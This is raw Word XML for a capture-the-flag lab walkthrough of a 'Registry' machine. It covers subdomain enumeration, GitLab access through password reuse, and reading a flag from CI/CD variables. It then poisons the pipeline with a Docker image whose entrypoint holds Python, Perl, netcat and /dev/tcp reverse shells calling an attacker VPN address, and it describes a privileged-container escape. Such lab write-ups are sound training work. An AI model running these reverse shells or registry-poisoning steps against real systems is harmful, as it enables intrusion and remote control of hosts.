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REGISTRY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine.If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dqe0m5xoujf3"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sxb5rajfvuid"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133600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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When accessing port 80, we are redirected to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">registry.uhclabs</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70300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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will need to map the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">address to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">domain </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name by adding a line to the hosts file, as illustrated in the image.</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86000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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Opening the site again, we receive a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">403 Forbidden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65400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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performing directory and file fuzzing and finding nothing, I move to another approach: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subdomain enumeration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00300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Bingo! We found a subdomain. We will add it to the hosts file.</w:t>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0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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subdomain, we get the GitLab page.</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5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GitLab is a Git-based software repository manager with support for Wiki, issue tracking, and CI/CD. GitLab is similar to GitHub, but it allows developers to store code on their own servers instead of third-party servers.</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Scrolling down a bit, we can click on → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explore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Public projects can be cloned without authentication via HTTPS. They are listed in the public access directory (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/public</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) for all users. Any logged-in user has the “Guest” role in the repository.</w:t>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32200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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52700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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Repository → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Commits</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add new file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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43200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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ycllyg8xfni" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Reuse</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commit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add new file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can log in as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">near</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the database password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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01900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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97100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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logging in as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">near</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can retrieve our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">first flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Settings → CI/CD → Variables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36900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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46400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Going to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repository → Files</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can see that the GitLab runner is using a WordPress Docker image pulled from the local registry.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“How to Build Docker Images and Host a Docker Image Repository with GitLab | DigitalOcean”</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1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Containerization is rapidly becoming the most accepted method of packaging and deploying applications in cloud environments. The standardization it provides, along with its resource efficiency (when compared to full virtual machines) and flexibility, makes it a major enabler of the modern DevOps mindset.</w:t>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hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.digitalocean.com/community/tutorials/como-construir-imagens-docker-e-hospedar-um-repositorio-de-imagens-docker-com-o-gitlab-pt</w:t>
        </w:r>
      </w:hyperlink>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in order to build Docker images, the runner needs full access to the Docker service itself. The recommended way to configure this is to use the official Docker </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-in-docker</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> image to run jobs. This requires granting the runner </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">privileged mode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can create our own Docker image that will grant us a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8leum66l711d" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Following the Steps Below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">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dqq5tgbno7ny" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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9gs3gucuyvnl" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dockerfile:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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FROM ubuntu:18.04</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RUN apt update &amp;&amp; apt install -y nmap curl</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COPY entrypoint.sh /</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RUN chmod +x /entrypoint.sh</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ENTRYPOINT ["/entrypoint.sh"]</w:t>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hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">entrypoint.sh</w:t>
        </w:r>
      </w:hyperlink>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entrypoint will contain our reverse shell payloads.</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command -v python &gt; /dev/null 2&gt;&amp;1; then</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socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("&lt;IP-VPN&gt;",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'</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exit;</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command -v perl &gt; /dev/null 2&gt;&amp;1; then</w:t>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perl -e 'use Socket;$i="&lt;IP-VPN&gt;";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))</w:t>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{open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</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exit;</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command -v nc &gt; /dev/null 2&gt;&amp;1; then</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rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc &lt;IP-VPN&gt; 443 &gt;/tmp/f</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exit;</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w:t>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command -v sh &gt; /dev/null 2&gt;&amp;1; then</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/bin/sh -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/443 0&gt;&amp;1</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exit;</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w:t>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build our Docker image:</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docker build -t my-image .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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90800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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the local registry port is exposed, we can use it to upload our image there.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker registry </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a local repository of Docker images.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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59"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docker tag my-image registry.uhclabs:5000/my-image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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1663700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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docker push registry.uhclabs:5000/my-image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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93900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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Open a Netcat listener to receive the connection.</w:t>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54"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change the WordPress image name to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">my-image</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so it will pull our image from the local registry and execute it, returning a shell to us.</w:t>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51100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="48"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025900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47"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editing the name, click → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Commit changes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our shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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70100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51"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this Docker container is running in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">privileged mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, all devices can be accessed under </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Therefore, we can escape by mounting the host disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">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oqz0r39894bo" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY without Python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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6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6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6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6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6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60600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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fdisk -l</w:t>
